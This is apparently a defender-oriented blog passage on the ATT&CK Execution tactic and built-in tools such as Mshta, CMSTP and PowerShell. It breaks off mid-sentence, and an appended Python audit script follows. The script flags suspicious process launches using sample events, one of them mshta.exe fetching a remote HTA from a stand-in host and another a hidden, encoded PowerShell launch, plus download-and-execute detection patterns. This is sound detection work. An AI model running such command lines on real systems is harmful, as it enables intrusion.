Of all the tactics an adversary uses in a campaign, none is more widely abused than Execution (https://attack.mitre.org/wiki/Execution). Whether you consider off-the-shelf malware, traditional ransomware, or state-of-the-art advanced persistent threat actors, all of them have execution in common. There’s a great quote from Alissa Torres which says, “Malware can hide, but it must run.”

Since malware must run, defenders get an opportunity to either block it or detect it. However, not all malware is a malicious executable that can easily be looked up on VirusTotal. In some cases, the malware will use built-in or trusted tools, some of which are already available on every endpoint.

Some techniques, such as Mshta or CMSTP, allow an attacker to abuse pre-installed applications for malicious purposes. The recommended way to prevent this type of attack is to remove any unnecessary code from endpoints where possible. This can be as simple as removing unnecessary services, as involved as implementing hardening controls, or as complex as running hardened and stripped-down Docker containers.

Other techniques, such as Command Line Interface or PowerShell, are extremely useful to attackers. In fact, a lot of fileless malware leverages one or both of these specifically. What makes these techniques so powerful for attackers is that the tools are already installed on the endpoints and are rarely, if ever, removed. System administrators and power users rely on some of these built-in tools every day.

Even the mitigation controls in ATT&CK state that these tools cannot be removed and can only be audited. Attackers are relying on the fact that the tools will be there and are hoping they are not being audited. To gain an advantage over attackers, simply enable auditing of
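As an added example (not code from the original post), here is a small Python audit that runs over process-creation records and flags executions of the built-in tools discussed above: mshta.exe and cmstp.exe at all, Office applications spawning a shell, and PowerShell launched with encoded, hidden or download-style arguments. The `key="value"` record format and the sample events are constructed assumptions for the example; a real deployment would feed it Sysmon Event ID 1 or Windows Security 4688 data.

```python
import re

# Constructed sample process-creation events (assumed key="value" format, not a real log).
SAMPLE_EVENTS = [
    'ts=2024-01-10T09:01:02 user=alice image="C:\\Windows\\System32\\cmd.exe" '
    'parent="C:\\Windows\\explorer.exe" cmdline="cmd.exe /c dir"',
    'ts=2024-01-10T09:03:15 user=bob image="C:\\Windows\\System32\\mshta.exe" '
    'parent="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" '
    'cmdline="mshta.exe http://example.invalid/a.hta"',
    'ts=2024-01-10T09:04:44 user=carol image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'parent="C:\\Windows\\explorer.exe" cmdline="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    'ts=2024-01-10T09:05:01 user=dave image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'parent="C:\\Windows\\explorer.exe" cmdline="powershell.exe Get-Service"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key="quoted value" or key=bareword

# Built-in tools that ATT&CK says can only be audited, not removed.
AUDITED_TOOLS = {"mshta.exe", "cmstp.exe", "cmd.exe", "powershell.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_PS_ARGS = re.compile(r"-enc\w*|-nop\w*|-w(indowstyle)?\s+hidden|downloadstring|\biex\b", re.I)


def parse_event(line):
    """Turn one record into a dict; quoted values keep their spaces."""
    return {k: (q or b) for k, q, b in KV_RE.findall(line)}


def assess(event):
    """Return (score, reasons); score is the number of audit rules the event trips."""
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "")
    reasons = []
    if image not in AUDITED_TOOLS:
        return 0, reasons
    if image in {"mshta.exe", "cmstp.exe"}:
        reasons.append(f"{image} is rarely run by users; review every execution")
    if image == "mshta.exe" and re.search(r"https?://", cmdline, re.I):
        reasons.append("mshta.exe was handed a remote URL")
    if parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office application {parent}")
    if image == "powershell.exe" and SUSPICIOUS_PS_ARGS.search(cmdline):
        reasons.append("powershell.exe launched with encoded/hidden/download arguments")
    return len(reasons), reasons


def audit(lines, threshold=1):
    """Parse every record and return alerts for events scoring at or above threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = assess(ev)
        if score >= threshold:
            alerts.append({"ts": ev.get("ts"), "user": ev.get("user"), "score": score, "reasons": reasons})
    return alerts
```

Running `audit(SAMPLE_EVENTS)` returns two alerts: the Word-spawned mshta.exe fetching a URL (three rules tripped) and the hidden, encoded PowerShell launch (one rule), while the ordinary cmd.exe and PowerShell usage produce nothing.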